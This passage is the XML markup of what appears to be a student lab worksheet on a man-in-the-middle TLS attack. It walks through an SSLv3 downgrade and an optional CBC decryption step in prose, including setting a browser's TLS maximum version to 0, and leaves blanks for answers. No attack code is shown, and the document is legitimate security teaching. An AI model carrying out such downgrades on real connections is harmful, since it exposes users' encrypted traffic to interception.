        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:color w:val="365f91"/>
          <w:sz w:val="28.079999923706055"/>
          <w:szCs w:val="28.079999923706055"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033">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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">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Fonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:color w:val="365f91"/>
          <w:sz w:val="28.079999923706055"/>
          <w:szCs w:val="28.079999923706055"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 – Create a user/session cookie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="3.507080078125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="18.959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widowControl w:val="0"/>
        <w:spacing w:before="257.51953125" w:line="280.5541706085205" w:lineRule="auto"/>
        <w:ind w:left="4.799957275390625" w:right="12.239990234375" w:firstLine="15.839996337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b w:val="1"/>
          <w:i w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user/session cookie</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used because webpages have no memory; session cookies allow the webpage you are visiting to keep track of your movement from page-to-page so the information you’ve already given the site to refresh and recurrently ask you for your information. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="308.16650390625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="18.959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rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Open </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">https:VulnerableServerIP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> address in a browser window on the victim machine and sign in with the following credentials:</w:t>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t xml:space="preserve">Username: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">John</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">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ab/>
        <w:t xml:space="preserve">Password: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mypasswd</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980000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    Based on your observations,</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in your own words, do your best to briefly describe </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:color w:val="980000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">why you think a session cookie is user/created for this attack</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="980000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="980000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="980000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">_____________________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">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980000"/>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Fonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:color w:val="365f91"/>
          <w:sz w:val="28.079999923706055"/>
          <w:szCs w:val="28.079999923706055"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 – Validating MitM attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">https:AttackersIPAddress </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">in another browser window on the victim machine and click the button “Ping HTTPS Server”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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back to the attacker machine and the script ran in Step 2 should now receive the package length and output it to the user. </w:t>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ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:color w:val="980000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:color w:val="980000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Received package length:_______________</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11.992645263671875" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:color w:val="365f91"/>
          <w:sz w:val="28.079999923706055"/>
          <w:szCs w:val="28.079999923706055"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4 – TLS/SSL Downgrade</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:before="308.16650390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protocol is not SSLv3.0 type </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">downgrade </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">into the terminal window with the received package length to initiate a TLS attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="308.16650390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before="308.16650390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before="3.5070800781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widowControl w:val="0"/>
        <w:spacing w:before="3.507080078125" w:line="240"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In some cases, the downgrade may not work; so for the purposes of this scenario we must manually downgrade the browsers TLS protocol. Open </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">about:config</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a browser tab in the victim machine and set </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">security.tls.version.max</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="308.16650390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2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="308.16650390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before="308.16650390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widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="11.992645263671875" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:color w:val="365f91"/>
          <w:sz w:val="28.079999923706055"/>
          <w:szCs w:val="28.079999923706055"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="365f91"/>
          <w:sz w:val="28.079999923706055"/>
          <w:szCs w:val="28.079999923706055"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Optional Steps</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:color w:val="365f91"/>
          <w:sz w:val="28.079999923706055"/>
          <w:szCs w:val="28.079999923706055"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Decryption attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="3.507080078125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="18.959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widowControl w:val="0"/>
        <w:spacing w:before="257.51953125" w:line="280.5541706085205" w:lineRule="auto"/>
        <w:ind w:left="4.799957275390625" w:right="12.239990234375" w:firstLine="15.839996337890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i w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">decryption attack</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a separate exploitation of information that is used by an attacker to gain information from a user. In this case, it is a supplementary attack that you can choose to do. In this attack you will decrypt the CBC information that you have gained from the previous attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="308.16650390625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="18.959960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widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="308.16650390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same terminal on the victim machine that has taken input such as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">downgrade</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, type the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">search </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">command and click find </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CBC block length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widowControl w:val="0"/>
        <w:spacing w:before="308.16650390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spacing w:before="308.16650390625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:color w:val="980000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:color w:val="980000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Block Length:____________</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="308.16650390625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:color w:val="980000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="308.16650390625"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5D">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="308.16650390625"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CBC </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(Cipher Block Chaining) is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a mode of operation that provides message dependence for generating ciphertext and makes the system non-deterministic</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">( an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="202124"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">algorithm that, even for the same input, can exhibit different behaviors on different runs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E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="308.16650390625"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5F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="308.16650390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the script has found the block length, type the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">active</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command into the terminal and choose </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run Decryption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widowControl w:val="0"/>
        <w:spacing w:before="308.16650390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widowControl w:val="0"/>
        <w:spacing w:before="308.16650390625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:color w:val="980000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:color w:val="980000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Decrypted CBC:_________________</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="308.16650390625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="980000"/>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